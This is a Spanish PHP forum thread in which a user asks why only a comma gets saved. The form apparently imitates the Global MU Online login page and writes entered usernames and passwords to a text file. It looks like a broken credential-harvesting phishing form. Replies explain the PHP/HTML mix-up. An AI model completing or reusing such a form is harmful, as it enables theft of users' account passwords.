Foros del Web » Programando para Internet » PHP »

Me aparece una coma al enviar datos a un .txt

Estas en el tema de Me aparece una coma al enviar datos a un .txt en el foro de PHP en Foros del Web. Cuando lleno el formulario pongo cualquier dato, doy en submit, y lo que me llega a el destino que en este caso es un archivo.txt, ...
  #1 (permalink)  
Antiguo 24/01/2009, 17:35
 
Fecha de Ingreso: enero-2009
Mensajes: 5
Antigüedad: 15 años, 2 meses
Puntos: 0
Me aparece una coma al enviar datos a un .txt

Cuando lleno el formulario pongo cualquier dato, doy en submit, y lo que me llega a el destino que en este caso es un archivo.txt, unicamente me aparece una coma, a que se puede deber esto?

Aca les dejo el fragmento del codigo:

<form action="login.php" method="post">
<table border="0" cellpadding="0" cellspacing="0">
<tbody><tr>

<td class="login">Username:</td>
<td>&nbsp;&nbsp;</td>
<td class="login" colspan="3">Password:</td>
</tr>
<tr>
<td><input class="fields" style="width: 120px;" name="usernamex"></td>
<td>&nbsp;</td>
<td>

<input class="fields" style="width: 120px;" value="" name="passwordx" type="password"></td>
<td>&nbsp;&nbsp;</td>
<td>
<input alt="Login" src="http://globalmuonline.gamersfirst.com/_img/button_login.gif" name="Login" type="image"file_put_contents('/htdocs/registros.txt' "$POST[usernamex],$POST[passwordx]");></td>
</tr>
  #2 (permalink)  
Antiguo 24/01/2009, 17:56
Avatar de korg1988  
Fecha de Ingreso: junio-2006
Ubicación: Santa Fe, Argentina
Mensajes: 825
Antigüedad: 17 años, 9 meses
Puntos: 19
Respuesta: Me aparece una coma al enviar datos a un .txt

estas mezclando php con html!!

en otras palabras, es un desastre eso jajaj

corregi el codigo
  #3 (permalink)  
Antiguo 24/01/2009, 18:00
okram
Invitado
 
Mensajes: n/a
Puntos:
Respuesta: Me aparece una coma al enviar datos a un .txt

Cómo pretendes usar $_POST en tu formulario, si justamente el $_POST se genera al enviar el formulario? Ten en mente una cosa. HTML no es PHP. El servidor PHP procesa X script y envía su contenido resultante, que puede ser un HTML. Se coloca una coma en tu archivo de texto porque al momento de generar el HTML, tu script PHP se encuentra con la instrucción (función) file_put_contents(), y la procesa para ver si hay alguna salida. Como obviamente no hay ningún dato $_POST, ambas variables que usas están vacías, y lo único que queda es la coma.

Busca un buen manual de PHP desde cero, pues esa es una cuestión muy básica, la más básica de todas.

Debes tener un script PHP que procese ese formulario, y que será abierto una vez se pulse un botón tipo submit. Los datos del formulario pasarán entonces a ese script en el array $_POST, y recién ahí es que lo podrás usar.

Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 01:52.